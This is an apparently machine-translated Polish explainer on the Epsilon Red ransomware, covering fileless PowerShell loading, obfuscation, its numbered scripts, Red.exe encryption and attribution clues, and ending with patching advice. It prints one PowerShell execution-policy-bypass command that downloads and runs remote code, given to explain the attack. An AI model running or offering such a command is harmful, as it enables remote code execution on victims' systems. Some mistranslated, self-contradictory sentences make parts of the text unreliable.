Co to jest oprogramowanie ransomware Epsilon Red?

Czy załatałeś już swoje serwery ?

Nowe zagrożenie ransomware , zwane Epsilon Red, atakuje niezałatane serwery Microsoft w centrach danych przedsiębiorstw. Nazwany na cześć mało znanego złoczyńcy z komiksów Marvela, Epsilon Red został niedawno odkryty przez firmę Sophos zajmującą się cyberbezpieczeństwem. Od czasu odkrycia oprogramowanie ransomware zaatakowało wiele organizacji na całym świecie.

Bezplikowe oprogramowanie ransomware „ukrywa się” w PowerShell

Bezplikowe oprogramowanie ransomware to forma złośliwego oprogramowania, która działa poprzez łączenie legalnego oprogramowania. Bezplikowe złośliwe oprogramowanie oparte na programie PowerShell wykorzystuje zdolność programu PowerShell do ładowania bezpośrednio do pamięci urządzenia. Ta funkcja pomaga chronić przed wykryciem złośliwego oprogramowania w skryptach PowerShell.

W typowym scenariuszu, gdy skrypt jest wykonywany, należy go najpierw zapisać na dysku urządzenia. Dzięki temu rozwiązania zabezpieczające punkty końcowe mogą wykrywać skrypty. Ponieważ program PowerShell jest wyłączony ze standardowych procesów wykonywania skryptów, może ominąć zabezpieczenia punktu końcowego. Ponadto użycie parametru obejścia w skrypcie PowerShell umożliwia osobie atakującej obejście ograniczeń skryptu sieciowego.

Przykładowy parametr obejścia programu PowerShell to:

powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))

Jak widać, zaprojektowanie parametrów obejścia programu PowerShell jest stosunkowo łatwe.

W odpowiedzi firma Microsoft wydała łatkę usuwającą lukę w zabezpieczeniach umożliwiającą zdalne wykonanie złośliwego oprogramowania związaną z programem PowerShell. Jednak plastry są tak skuteczne, jak są stosowane. Wiele organizacji złagodziło standardy instalowania poprawek, przez co ich środowiska są podatne na ataki. Projekt Epsilon Red ma wykorzystać ten poziom podatności.

Podwójna użyteczność Epsilon Red

Ponieważ Epsilon Red jest najskuteczniejszy w przypadku niezałatanych serwerów Microsoftu, złośliwe oprogramowanie może zostać wykorzystane jako narzędzie ransomware i identyfikacji. To, czy Epsilon odniesie sukces w danym środowisku, daje atakującym lepszy wgląd w możliwości bezpieczeństwa swojego celu.

Jeśli firmie Epsilon uda się uzyskać dostęp do serwera Microsoft Exchange Server, oznacza to, że organizacja nie stosuje się do najlepszych praktyk w zakresie łatania zabezpieczeń. Dla atakującego pokazuje to, jak łatwo Epsilon może naruszyć resztę otoczenia celu.

Epsilon Red wykorzystuje zaciemnianie, aby ukryć swój ładunek. Zaciemnianie powoduje, że kod jest nieczytelny i jest używane w złośliwym oprogramowaniu PowerShell w celu uniknięcia wysokiej czytelności skryptów PowerShell. W przypadku zaciemniania używane są polecenia cmdlet aliasów programu PowerShell , które utrudniają oprogramowaniu antywirusowemu identyfikację złośliwych skryptów w dziennikach programu PowerShell.

Co to jest oprogramowanie ransomware Epsilon Red?

Epsilon Red jest najskuteczniejszy w przypadku niezałatanych serwerów Microsoft

Jednak nadal można zidentyfikować zaciemnione skrypty programu PowerShell. Typową oznaką zbliżającego się ataku skryptu PowerShell jest utworzenie obiektu WebClient. Osoba atakująca utworzy obiekt WebClient w kodzie PowerShell, aby nawiązać połączenie zewnętrzne ze zdalnym adresem URL zawierającym złośliwy kod.

Jeśli organizacja zostanie zaatakowana, prawdopodobieństwo, że posiada ona wystarczające środki bezpieczeństwa umożliwiające wykrycie zaciemnionych skryptów PowerShell, jest bardzo niskie. I odwrotnie, jeśli Epsilon Red nie przeniknie do serwera, będzie to dla atakującego sygnałem, że sieć celu może szybko odszyfrować złośliwe oprogramowanie PowerShell, czyniąc atak mniej wartościowym, a bardziej wartościowym.

Włamanie do sieci Epsilon Red

Funkcjonalność Epsilon Red jest bardzo prosta. Oprogramowanie wykorzystuje serię skryptów Powershell do infiltracji serwerów. Te skrypty programu PowerShell są ponumerowane od 1.ps1 do 12.ps1. Projekt każdego skryptu PowerShell polega na przygotowaniu serwera docelowego na końcowy ładunek.

Wszystkie skrypty PowerShell w Epsilon Red mają swój własny cel. Jeden ze skryptów PowerShell w Epsilon Red ma na celu rozwiązanie reguł zapory sieciowej obiektu docelowego. Kolejne oprogramowanie z tej serii przeznaczone do odinstalowywania oprogramowania antywirusowego celu .

Jak można się domyślić, skrypty te działają zsynchronizowane, aby zapewnić, że po dostarczeniu ładunku cel nie będzie mógł szybko zatrzymać swojego postępu.

Przesyłaj ładunek

Gdy skrypty PowerShell firmy Epsilon ustąpią miejsca ostatecznemu ładunkowi, są one dystrybuowane jako rozszerzenie Red.exe . Po wejściu na serwer Red.exe przeskanuje pliki serwera i utworzy listę ścieżek katalogów dla każdego wykrytego pliku. Po utworzeniu listy procesy potomne są tworzone z głównego pliku złośliwego oprogramowania dla każdej ścieżki katalogu na liście. Następnie każdy podplik oprogramowania ransomware szyfruje ścieżkę katalogu z pliku listy.

Po zaszyfrowaniu wszystkich ścieżek folderów na liście firmy Epson pozostawiony zostanie plik .txt informujący cel i zawierający żądanie atakującego. Ponadto wszystkie dostępne węzły sieciowe podłączone do zaatakowanego serwera zostaną wówczas naruszone, a prawdopodobieństwo przedostania się złośliwego oprogramowania do sieci może wzrosnąć.

Kto stoi za Epsilon Red?

Co to jest oprogramowanie ransomware Epsilon Red?

Tożsamość napastników stojących za Epsilon Red jest nadal nieznana

Tożsamość napastników stojących za Epsilon Red jest nadal nieznana. Jednak pewne wskazówki wskazują na pochodzenie napastników. Pierwszą wskazówką jest nazwa szkodliwego oprogramowania. Epsilon Red to złoczyńca X-Men o rosyjskim pochodzeniu.

Druga wskazówka kryje się w żądaniu okupu w pliku .txt pozostawionym przez kod. Jest podobna do notatki pozostawionej przez gang zajmujący się oprogramowaniem ransomware o nazwie REvil. Podobieństwo to nie oznacza jednak, że napastnicy byli członkami tego gangu. REvil prowadzi operację RaaS (ransomware jako usługa), w ramach której podmioty stowarzyszone płacą REvil za dostęp do szkodliwego oprogramowania.

Chroń się przed Epsilon Red

Jak dotąd Epsilon Red z powodzeniem przedostał się na niezałatane serwery. Oznacza to, że jedną z najlepszych zabezpieczeń przed Epsilon Red i podobnym złośliwym oprogramowaniem ransomware jest zapewnienie prawidłowego zarządzania środowiskiem. Ponadto posiadanie rozwiązania zabezpieczającego, które może szybko odszyfrować skrypty PowerShell, byłoby przydatnym dodatkiem do Twojego środowiska.

Zostaw komentarz

Jak usunąć informację o żądaniu praw autorskich w prawym rogu ekranu w systemie Windows 10

Jak usunąć informację o żądaniu praw autorskich w prawym rogu ekranu w systemie Windows 10

Czy widzisz powiadomienie o aktywacji systemu Windows 10 w prawym rogu ekranu? W tym artykule dowiesz się, jak usunąć powiadomienie o żądaniu dotyczącym praw autorskich w systemie Windows 10.

Instrukcje od AZ dotyczące instalacji systemu Windows 10 w wersji 14393.222

Instrukcje od AZ dotyczące instalacji systemu Windows 10 w wersji 14393.222

Niedawno firma Microsoft wydała najnowszą aktualizację zbiorczą dla użytkowników komputerów PC z systemem Windows 10 o nazwie Build 14393.222. Ta aktualizacja wydana dla systemu Windows 10 naprawia głównie błędy na podstawie opinii użytkowników i poprawia wydajność systemu operacyjnego.

Chroń swoją sieć komputerową za pomocą hosta Bastion w zaledwie 3 krokach

Chroń swoją sieć komputerową za pomocą hosta Bastion w zaledwie 3 krokach

Czy masz komputery w sieci lokalnej, które wymagają dostępu zewnętrznego? Dobrym rozwiązaniem może być użycie hosta bastionowego jako strażnika sieci.

3 sposoby na szybkie wyczyszczenie wszystkich dzienników zdarzeń w systemie Windows 10

3 sposoby na szybkie wyczyszczenie wszystkich dzienników zdarzeń w systemie Windows 10

Czasami może być konieczne jednoczesne usunięcie wszystkich starych dzienników zdarzeń. W tym przewodniku Quantrimang.com pokaże Ci 3 sposoby szybkiego usunięcia wszystkich dzienników zdarzeń w Podglądzie zdarzeń systemu Windows 10.

Jak utworzyć klucz Windows, jeśli klawiatura nie jest dostępna

Jak utworzyć klucz Windows, jeśli klawiatura nie jest dostępna

Jeśli wolisz używać starej, klasycznej klawiatury, takiej jak IBM Model M, która nie zawiera fizycznego klawisza Windows, istnieje prosty sposób, aby dodać więcej, pożyczając klawisz, którego nie używasz często.

Jak utworzyć tryb przezroczystego tła w systemie Windows 10

Jak utworzyć tryb przezroczystego tła w systemie Windows 10

WindowTop to narzędzie, które ma możliwość przyciemnienia wszystkich okien aplikacji i programów działających na komputerach z systemem Windows 10. Możesz także użyć interfejsu z ciemnym tłem w systemie Windows.

Metody fałszywego adresu IP umożliwiają anonimowy dostęp

Metody fałszywego adresu IP umożliwiają anonimowy dostęp

W wielu poprzednich artykułach wspominaliśmy, że zachowanie anonimowości w Internecie jest niezwykle ważne. Co roku dochodzi do wycieku prywatnych informacji, co sprawia, że ​​bezpieczeństwo w Internecie staje się coraz bardziej konieczne. Z tego też powodu powinniśmy używać wirtualnych adresów IP. Poniżej dowiemy się o metodach tworzenia fałszywych adresów IP!

Jak wyłączyć pasek języka na pasku zadań systemu Windows 8

Jak wyłączyć pasek języka na pasku zadań systemu Windows 8

Pasek języka w systemie Windows 8 to miniaturowy pasek narzędzi języka, zaprojektowany tak, aby automatycznie wyświetlał się na ekranie komputera stacjonarnego. Jednak wiele osób chce ukryć ten pasek języka na pasku zadań.

Wskazówki dotyczące optymalizacji szybkości połączenia internetowego od Linksys

Wskazówki dotyczące optymalizacji szybkości połączenia internetowego od Linksys

Maksymalizacja szybkości Internetu jest niezbędna do optymalizacji połączenia sieciowego. Możesz cieszyć się optymalną rozrywką i pracą, korzystając z komputerów, telewizorów z dostępem do Internetu, konsol do gier itp.

Jak skonfigurować WEP, WPA, WPA2 dla routera Linksys

Jak skonfigurować WEP, WPA, WPA2 dla routera Linksys

Łączność bezprzewodowa jest dziś koniecznością i dlatego bezpieczeństwo sieci bezprzewodowej jest niezbędne do zapewnienia bezpieczeństwa w sieci wewnętrznej.